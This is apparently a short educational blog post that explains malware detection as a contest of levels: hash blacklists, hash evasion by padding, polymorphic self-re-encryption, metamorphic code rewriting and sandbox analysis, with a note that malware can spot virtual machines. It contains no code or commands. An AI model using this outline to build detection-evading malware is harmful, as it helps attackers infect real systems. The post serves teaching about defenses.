Malwares Typology
Poly and Metamorphic Malwares
Malwares in a nutshell
Attack lvl 1
Malwares spread by email. Exact copy here and there.
Defense lvl 1
Take the hash of the code before executing. First line of defense. If the hash of a unknown piece of code match a malware blacklist, then send an alert, do not install.
Attack lvl 2
Hash is very sensitive to update. One single bit change, and you get a completely different hash.
So, to circumvent the hash defense: Easy; just add trash code / strings at the end of your code.
Defense lvl 2
Now, hash become useless (not yet, but they don’t prevent all attacks).
To detect if the code is genuine or not, it looks at the code, checking known patterns, looking at hamming distance between some blocks.
Attack lvl 3: Polymorphic Malwares
The code is analyzed in such a way it looks for similar piece of code. To prevent that: Encrypt the code. For two different encryption keys, the same piece of code will have the same size, but the two resulting strings will be completely different.
What ? How can it run if encrypted ?
The key can be in the program (before or after the encrypted block), so that it can be run alone.
Or remote. But in that case, it needs to connect to a server to activate itself …
To copy itself, the malware is decrypted, it generate a new encryption key from randomness and re-encrypt itself.
Defense lvl 3
You might detect in the code encrypted parts + Decryption module which should be standard accross the different malware.
Having encrypted part in a program is suspicious. Ok for DRM, but in a regular case, a program may obfuscate a bit the code, not encrypt it.
Attack lvl 4: Metamorphic Malwares
Ok, encrypted malware are too suspicious.
Metamortphic malware use a strategy to overcome traditionnal code analysis:
- Add dummy comments (so strings are never equal)
- Reorder functions
- Rename variables
- Add dummy functions (that do nothing, but prevent easy comparison)
Each time the malware duplicate, it modify itself so the copy is different.
Defense lvl 4: Sandboxing
The behavior of Malware is supposed to be the same, even after shuffling the code parts.
To detect them, we put them in boxes, and check what they are effectively doing: access to file, to network, etc. This creates some “traces”.
Malware are then compared using these traces, if they behave similarly, connecting to the same server, doing the same actions …
However, sandboxing is not easy. Reproducing a “true computer” is hard. A VM does not have keyword, mouse and screen, so it can be detected by a malware that this is an “incomplete” computer.
>> You can subscribe to my mailing list here for a monthly update. <<